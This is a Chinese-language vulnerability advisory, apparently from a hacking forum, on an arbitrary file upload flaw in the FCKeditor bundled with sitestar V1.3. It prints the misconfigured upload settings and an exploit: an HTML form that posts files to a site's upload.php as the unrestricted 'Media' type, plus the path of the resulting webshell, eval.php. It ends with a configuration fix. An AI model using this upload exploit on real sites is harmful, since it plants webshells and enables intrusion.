发布日期:2011-01.15
发布作者:udb311
影响版本:sitestar V1.3
官方网站:http://www.sitestar.cn
漏洞类型:文件上传
漏洞描述:此漏洞存仍然存在于FCK上传,程序采用了FCKeditor Version 2 .0。除了xiaocao 童鞋发布的建立1.ASP文件夹漏洞,还存在上传php脚本漏洞。
关键字:保留吧,以免批量
[code][/code][/code]
漏洞文件:/admin/fckeditor/upload/config.php
- <?php
- //省略代码
- // Due to security issues with Apache modules, it is reccomended to leave the
- // following setting enabled.
- $Config['ForceSingleExtension'] = true ;
- $Config['AllowedExtensions']['File'] = array() ;
- $Config['DeniedExtensions']['File'] = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
- $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
- $Config['DeniedExtensions']['Image'] = array() ;
- $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
- $Config['DeniedExtensions']['Flash'] = array() ;
- ?>
[/php]
看代码,这是修改过的FCKeditor配置文件。未对'Media'进行限制,导致可以上传任意文件。
测试方法:
和Fckeditor 2.4.2 原理一样。
http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html
上传EXP:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> |
上传shell地址:
http://域名/upload/media/eval.php
上图证明:
漏洞修复:同理
修改config文件,限制上传目录的脚本执行权限。
1 2 3 4 5 | <ol> <li>$Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;</li> <li>$Config['DeniedExtensions']['Media'] = array() ;</li> </ol> <div> |
会员登录关闭
注册会员关闭